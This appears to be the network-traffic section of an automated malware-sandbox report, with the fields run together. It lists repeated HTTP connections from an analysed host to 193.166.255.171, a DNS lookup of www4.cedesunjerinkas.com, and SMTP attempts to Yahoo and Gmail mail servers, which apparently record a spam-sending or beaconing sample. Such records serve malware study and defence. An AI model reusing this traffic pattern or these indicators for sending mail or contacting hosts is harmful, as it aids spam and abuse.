                                                                Oct 31, 2024 15:26:29.081857920 CET8049733193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:26:30.702589035 CET4973025192.168.2.498.136.96.75
                                                                Oct 31, 2024 15:26:34.721445084 CET4973025192.168.2.498.136.96.75
                                                                Oct 31, 2024 15:26:37.558294058 CET8049733193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:26:37.558372021 CET4973380192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:26:37.558451891 CET4973380192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:26:37.563303947 CET8049733193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:26:37.691273928 CET4973980192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:26:37.696943045 CET8049739193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:26:37.697010994 CET4973980192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:26:37.697303057 CET4973980192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:26:37.702600956 CET8049739193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:26:42.732346058 CET4973025192.168.2.498.136.96.75
                                                                Oct 31, 2024 15:26:46.221693993 CET8049739193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:26:46.221781015 CET4973980192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:26:46.221856117 CET4973980192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:26:46.226819992 CET8049739193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:26:46.296720028 CET4974025192.168.2.498.136.96.75
                                                                Oct 31, 2024 15:26:46.327130079 CET4974180192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:26:46.330539942 CET4974280192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:26:46.332652092 CET8049741193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:26:46.332760096 CET4974180192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:26:46.332851887 CET4974180192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:26:46.335717916 CET8049742193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:26:46.335787058 CET4974280192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:26:46.335863113 CET4974280192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:26:46.338223934 CET8049741193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:26:46.340832949 CET8049742193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:26:47.310470104 CET4974025192.168.2.498.136.96.75
                                                                Oct 31, 2024 15:26:48.748306990 CET4974325192.168.2.498.136.96.77
                                                                Oct 31, 2024 15:26:49.326062918 CET4974025192.168.2.498.136.96.75
                                                                Oct 31, 2024 15:26:49.763719082 CET4974325192.168.2.498.136.96.77
                                                                Oct 31, 2024 15:26:51.779304028 CET4974325192.168.2.498.136.96.77
                                                                Oct 31, 2024 15:26:53.330113888 CET4974025192.168.2.498.136.96.75
                                                                Oct 31, 2024 15:26:54.839283943 CET8049742193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:26:54.839416981 CET4974280192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:26:54.839504957 CET4974280192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:26:54.844655037 CET8049742193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:26:54.851120949 CET8049741193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:26:54.851260900 CET4974180192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:26:54.851260900 CET4974180192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:26:54.857156038 CET8049741193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:26:54.953275919 CET4974480192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:26:54.958517075 CET8049744193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:26:54.958630085 CET4974480192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:26:54.958703995 CET4974480192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:26:54.963952065 CET8049744193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:26:54.968606949 CET4974580192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:26:54.973504066 CET8049745193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:26:54.973618031 CET4974580192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:26:54.973681927 CET4974580192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:26:54.980391979 CET8049745193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:26:55.779251099 CET4974325192.168.2.498.136.96.77
                                                                Oct 31, 2024 15:27:01.341702938 CET4974025192.168.2.498.136.96.75
                                                                Oct 31, 2024 15:27:03.433792114 CET8049744193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:03.434045076 CET4974480192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:03.434045076 CET4974480192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:03.439714909 CET8049744193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:03.466941118 CET8049745193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:03.467045069 CET4974580192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:03.467210054 CET4974580192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:03.472203970 CET8049745193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:03.547101974 CET4974680192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:03.552113056 CET8049746193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:03.552225113 CET4974680192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:03.552293062 CET4974680192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:03.557104111 CET8049746193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:03.578301907 CET4974780192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:03.583781958 CET8049747193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:03.583873987 CET4974780192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:03.583918095 CET4974780192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:03.588983059 CET8049747193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:03.779206991 CET4974325192.168.2.498.136.96.77
                                                                Oct 31, 2024 15:27:07.416678905 CET4974825192.168.2.467.195.204.77
                                                                Oct 31, 2024 15:27:08.419903040 CET4974825192.168.2.467.195.204.77
                                                                Oct 31, 2024 15:27:09.779808998 CET4975125192.168.2.467.195.228.94
                                                                Oct 31, 2024 15:27:10.419847012 CET4974825192.168.2.467.195.204.77
                                                                Oct 31, 2024 15:27:10.779268980 CET4975125192.168.2.467.195.228.94
                                                                Oct 31, 2024 15:27:12.073622942 CET8049746193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:12.073717117 CET4974680192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:12.094388008 CET8049747193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:12.094486952 CET4974780192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:12.125976086 CET4974680192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:12.126662970 CET4974780192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:12.130806923 CET8049746193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:12.131541014 CET8049747193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:12.274418116 CET4976280192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:12.274990082 CET4976380192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:12.279978991 CET8049762193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:12.280085087 CET4976280192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:12.280694008 CET4976280192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:12.280718088 CET8049763193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:12.280766010 CET4976380192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:12.280836105 CET4976380192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:12.285598993 CET8049762193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:12.285716057 CET8049763193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:12.779448986 CET4975125192.168.2.467.195.228.94
                                                                Oct 31, 2024 15:27:14.419825077 CET4974825192.168.2.467.195.204.77
                                                                Oct 31, 2024 15:27:16.794914961 CET4975125192.168.2.467.195.228.94
                                                                Oct 31, 2024 15:27:20.771531105 CET8049763193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:20.771756887 CET4976380192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:20.771820068 CET8049762193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:20.771838903 CET4976380192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:20.771888018 CET4976280192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:20.771959066 CET4976280192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:20.776753902 CET8049763193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:20.776839972 CET8049762193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:20.878756046 CET4980780192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:20.879005909 CET4980880192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:20.883886099 CET8049807193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:20.883923054 CET8049808193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:20.884022951 CET4980780192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:20.884062052 CET4980880192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:20.884182930 CET4980780192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:20.884277105 CET4980880192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:20.889147043 CET8049807193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:20.889158964 CET8049808193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:22.420473099 CET4974825192.168.2.467.195.204.77
                                                                Oct 31, 2024 15:27:24.794841051 CET4975125192.168.2.467.195.228.94
                                                                Oct 31, 2024 15:27:28.436110973 CET4984225192.168.2.467.195.228.94
                                                                Oct 31, 2024 15:27:29.358830929 CET8049807193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:29.358961105 CET4980780192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:29.359138966 CET4980780192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:29.363872051 CET8049807193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:29.372440100 CET8049808193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:29.372530937 CET4980880192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:29.372694969 CET4980880192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:29.377449036 CET8049808193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:29.451237917 CET4984225192.168.2.467.195.228.94
                                                                Oct 31, 2024 15:27:29.468803883 CET4984980192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:29.473881960 CET8049849193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:29.473984957 CET4984980192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:29.474132061 CET4984980192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:29.478950977 CET8049849193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:29.484273911 CET4985080192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:29.489253044 CET8049850193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:29.489623070 CET4985080192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:29.489686966 CET4985080192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:29.494779110 CET8049850193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:30.933254957 CET4985825192.168.2.4142.251.1.26
                                                                Oct 31, 2024 15:27:31.451081991 CET4984225192.168.2.467.195.228.94
                                                                Oct 31, 2024 15:27:31.919845104 CET4985825192.168.2.4142.251.1.26
                                                                Oct 31, 2024 15:27:33.919914961 CET4985825192.168.2.4142.251.1.26
                                                                Oct 31, 2024 15:27:35.451339960 CET4984225192.168.2.467.195.228.94
                                                                Oct 31, 2024 15:27:37.935528040 CET4985825192.168.2.4142.251.1.26
                                                                Oct 31, 2024 15:27:37.966505051 CET8049849193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:37.966562986 CET4984980192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:37.967412949 CET4984980192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:37.972280979 CET8049849193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:37.973392963 CET8049850193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:37.973450899 CET4985080192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:37.975759029 CET4985080192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:37.980624914 CET8049850193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:38.510632038 CET4989480192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:38.517055035 CET8049894193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:38.517143965 CET4989480192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:38.523509979 CET4989680192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:38.528378963 CET8049896193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:38.528460026 CET4989680192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:38.541481972 CET4989480192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:38.542469025 CET4989680192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:38.546916008 CET8049894193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:38.547504902 CET8049896193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:43.451121092 CET4984225192.168.2.467.195.228.94
                                                                Oct 31, 2024 15:27:45.951105118 CET4985825192.168.2.4142.251.1.26
                                                                Oct 31, 2024 15:27:47.095177889 CET8049894193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:47.095195055 CET8049896193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:47.095297098 CET4989680192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:47.095324039 CET4989480192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:47.095359087 CET4989680192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:47.095401049 CET4989480192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:47.102680922 CET8049896193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:47.102816105 CET8049894193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:47.202682018 CET4993680192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:47.203018904 CET4993780192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:47.207772017 CET8049936193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:47.207870007 CET4993680192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:47.207916021 CET8049937193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:47.207947016 CET4993680192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:47.207978010 CET4993780192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:47.208086967 CET4993780192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:47.212759018 CET8049936193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:47.212833881 CET8049937193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:49.452737093 CET4995025192.168.2.4142.251.1.26
                                                                Oct 31, 2024 15:27:50.466758013 CET4995025192.168.2.4142.251.1.26
                                                                Oct 31, 2024 15:27:51.951534033 CET4996325192.168.2.4142.250.153.26
                                                                Oct 31, 2024 15:27:52.466764927 CET4995025192.168.2.4142.251.1.26
                                                                Oct 31, 2024 15:27:52.951122046 CET4996325192.168.2.4142.250.153.26
                                                                Oct 31, 2024 15:27:54.951164961 CET4996325192.168.2.4142.250.153.26
                                                                Oct 31, 2024 15:27:55.713185072 CET8049937193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:55.713359118 CET4993780192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:55.713479042 CET4993780192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:55.714853048 CET8049936193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:55.714931965 CET4993680192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:55.715009928 CET4993680192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:55.718272924 CET8049937193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:55.720273972 CET8049936193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:55.828031063 CET4998180192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:55.828340054 CET4998280192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:55.833177090 CET8049981193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:55.833419085 CET4998180192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:55.833419085 CET4998180192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:55.833537102 CET8049982193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:55.833590984 CET4998280192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:55.833657980 CET4998280192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:55.838495970 CET8049981193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:55.839205027 CET8049982193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:56.466772079 CET4995025192.168.2.4142.251.1.26
                                                                Oct 31, 2024 15:27:58.951159954 CET4996325192.168.2.4142.250.153.26
                                                                Oct 31, 2024 15:28:04.318834066 CET8049982193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:28:04.318931103 CET4998280192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:28:04.322489977 CET8049981193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:28:04.322583914 CET4998180192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:28:04.336560965 CET4998280192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:28:04.336817980 CET4998180192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:28:04.341581106 CET8049982193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:28:04.341936111 CET8049981193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:28:04.471807957 CET5002780192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:28:04.476638079 CET8050027193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:28:04.476758003 CET5002780192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:28:04.480755091 CET5002880192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:28:04.482383966 CET4995025192.168.2.4142.251.1.26
                                                                Oct 31, 2024 15:28:04.485833883 CET8050028193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:28:04.485924006 CET5002880192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:28:04.488432884 CET5002780192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:28:04.492134094 CET5002880192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:28:04.494473934 CET8050027193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:28:04.497014999 CET8050028193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:28:06.951163054 CET4996325192.168.2.4142.250.153.26
                                                                Oct 31, 2024 15:28:10.498394966 CET5003425192.168.2.4142.250.153.26
                                                                Oct 31, 2024 15:28:11.513684034 CET5003425192.168.2.4142.250.153.26
                                                                Oct 31, 2024 15:28:12.951625109 CET5003525192.168.2.4142.251.9.27
                                                                Oct 31, 2024 15:28:12.964895964 CET8050027193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:28:12.965051889 CET5002780192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:28:12.965197086 CET5002780192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:28:12.969991922 CET8050027193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:28:12.976293087 CET8050028193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:28:12.976430893 CET5002880192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:28:12.976540089 CET5002880192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:28:12.981458902 CET8050028193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:28:13.078697920 CET5003680192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:28:13.083451986 CET8050036193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:28:13.083568096 CET5003680192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:28:13.083667994 CET5003680192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:28:13.088459015 CET8050036193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:28:13.093728065 CET5003780192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:28:13.098571062 CET8050037193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:28:13.098695040 CET5003780192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:28:13.098790884 CET5003780192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:28:13.103835106 CET8050037193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:28:13.529362917 CET5003425192.168.2.4142.250.153.26
                                                                Oct 31, 2024 15:28:13.967947960 CET5003525192.168.2.4142.251.9.27
                                                                Oct 31, 2024 15:28:15.982487917 CET5003525192.168.2.4142.251.9.27
                                                                Oct 31, 2024 15:28:17.529244900 CET5003425192.168.2.4142.250.153.26
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Oct 31, 2024 15:26:27.227699041 CET5335153192.168.2.41.1.1.1
                                                                Oct 31, 2024 15:26:27.333014011 CET53533511.1.1.1192.168.2.4
                                                                Oct 31, 2024 15:26:27.354674101 CET6416153192.168.2.41.1.1.1
                                                                Oct 31, 2024 15:26:27.363266945 CET53641611.1.1.1192.168.2.4
                                                                Oct 31, 2024 15:26:27.588536978 CET5817853192.168.2.41.1.1.1
                                                                Oct 31, 2024 15:26:27.595181942 CET53581781.1.1.1192.168.2.4
                                                                Oct 31, 2024 15:26:27.662923098 CET5697453192.168.2.41.1.1.1
                                                                Oct 31, 2024 15:26:27.670669079 CET53569741.1.1.1192.168.2.4
                                                                Oct 31, 2024 15:26:27.933881044 CET6118153192.168.2.41.1.1.1
                                                                Oct 31, 2024 15:26:27.967988968 CET53611811.1.1.1192.168.2.4
                                                                Oct 31, 2024 15:26:46.287249088 CET5943953192.168.2.41.1.1.1
                                                                Oct 31, 2024 15:26:46.294744968 CET53594391.1.1.1192.168.2.4
                                                                Oct 31, 2024 15:27:30.852016926 CET5422553192.168.2.41.1.1.1
                                                                Oct 31, 2024 15:27:30.858683109 CET53542251.1.1.1192.168.2.4
                                                                Oct 31, 2024 15:27:30.889173031 CET6377053192.168.2.41.1.1.1
                                                                Oct 31, 2024 15:27:30.896532059 CET53637701.1.1.1192.168.2.4
                                                                Oct 31, 2024 15:27:30.897433043 CET5178053192.168.2.41.1.1.1
                                                                Oct 31, 2024 15:27:30.904759884 CET53517801.1.1.1192.168.2.4
                                                                Oct 31, 2024 15:27:30.905430079 CET5670253192.168.2.41.1.1.1
                                                                Oct 31, 2024 15:27:30.912798882 CET53567021.1.1.1192.168.2.4
                                                                Oct 31, 2024 15:27:30.913711071 CET6044053192.168.2.41.1.1.1
                                                                Oct 31, 2024 15:27:30.921724081 CET53604401.1.1.1192.168.2.4
                                                                Oct 31, 2024 15:27:30.925535917 CET5525953192.168.2.41.1.1.1
                                                                Oct 31, 2024 15:27:30.932661057 CET53552591.1.1.1192.168.2.4
                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Oct 31, 2024 15:26:27.227699041 CET192.168.2.41.1.1.10x1fafStandard query (0)yahoo.comMX (Mail exchange)IN (0x0001)false
                                                                Oct 31, 2024 15:26:27.354674101 CET192.168.2.41.1.1.10x7ec1Standard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                Oct 31, 2024 15:26:27.588536978 CET192.168.2.41.1.1.10x3d72Standard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                Oct 31, 2024 15:26:27.662923098 CET192.168.2.41.1.1.10x1909Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                Oct 31, 2024 15:26:27.933881044 CET192.168.2.41.1.1.10x57ccStandard query (0)www4.cedesunjerinkas.comA (IP address)IN (0x0001)false
                                                                Oct 31, 2024 15:26:46.287249088 CET192.168.2.41.1.1.10x8baaStandard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                Oct 31, 2024 15:27:30.852016926 CET192.168.2.41.1.1.10x5d7bStandard query (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                Oct 31, 2024 15:27:30.889173031 CET192.168.2.41.1.1.10x38d1Standard query (0)alt2.gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                Oct 31, 2024 15:27:30.897433043 CET192.168.2.41.1.1.10xa51dStandard query (0)alt4.gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                Oct 31, 2024 15:27:30.905430079 CET192.168.2.41.1.1.10x9fa4Standard query (0)alt3.gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                Oct 31, 2024 15:27:30.913711071 CET192.168.2.41.1.1.10x7217Standard query (0)alt1.gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                Oct 31, 2024 15:27:30.925535917 CET192.168.2.41.1.1.10x34fStandard query (0)gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Oct 31, 2024 15:26:27.333014011 CET1.1.1.1192.168.2.40x1fafNo error (0)yahoo.comMX (Mail exchange)IN (0x0001)false
                                                                Oct 31, 2024 15:26:27.333014011 CET1.1.1.1192.168.2.40x1fafNo error (0)yahoo.comMX (Mail exchange)IN (0x0001)false
                                                                Oct 31, 2024 15:26:27.333014011 CET1.1.1.1192.168.2.40x1fafNo error (0)yahoo.comMX (Mail exchange)IN (0x0001)false
                                                                Oct 31, 2024 15:26:27.363266945 CET1.1.1.1192.168.2.40x7ec1No error (0)mta5.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                Oct 31, 2024 15:26:27.363266945 CET1.1.1.1192.168.2.40x7ec1No error (0)mta5.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                Oct 31, 2024 15:26:27.363266945 CET1.1.1.1192.168.2.40x7ec1No error (0)mta5.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                Oct 31, 2024 15:26:27.363266945 CET1.1.1.1192.168.2.40x7ec1No error (0)mta5.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                Oct 31, 2024 15:26:27.363266945 CET1.1.1.1192.168.2.40x7ec1No error (0)mta5.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                Oct 31, 2024 15:26:27.363266945 CET1.1.1.1192.168.2.40x7ec1No error (0)mta5.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                Oct 31, 2024 15:26:27.363266945 CET1.1.1.1192.168.2.40x7ec1No error (0)mta5.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                Oct 31, 2024 15:26:27.363266945 CET1.1.1.1192.168.2.40x7ec1No error (0)mta5.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                Oct 31, 2024 15:26:27.595181942 CET1.1.1.1192.168.2.40x3d72No error (0)mta7.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                Oct 31, 2024 15:26:27.595181942 CET1.1.1.1192.168.2.40x3d72No error (0)mta7.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                Oct 31, 2024 15:26:27.595181942 CET1.1.1.1192.168.2.40x3d72No error (0)mta7.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                Oct 31, 2024 15:26:27.595181942 CET1.1.1.1192.168.2.40x3d72No error (0)mta7.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                Oct 31, 2024 15:26:27.595181942 CET1.1.1.1192.168.2.40x3d72No error (0)mta7.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                Oct 31, 2024 15:26:27.595181942 CET1.1.1.1192.168.2.40x3d72No error (0)mta7.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                Oct 31, 2024 15:26:27.595181942 CET1.1.1.1192.168.2.40x3d72No error (0)mta7.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                Oct 31, 2024 15:26:27.595181942 CET1.1.1.1192.168.2.40x3d72No error (0)mta7.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                Oct 31, 2024 15:26:27.670669079 CET1.1.1.1192.168.2.40x1909No error (0)mta6.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
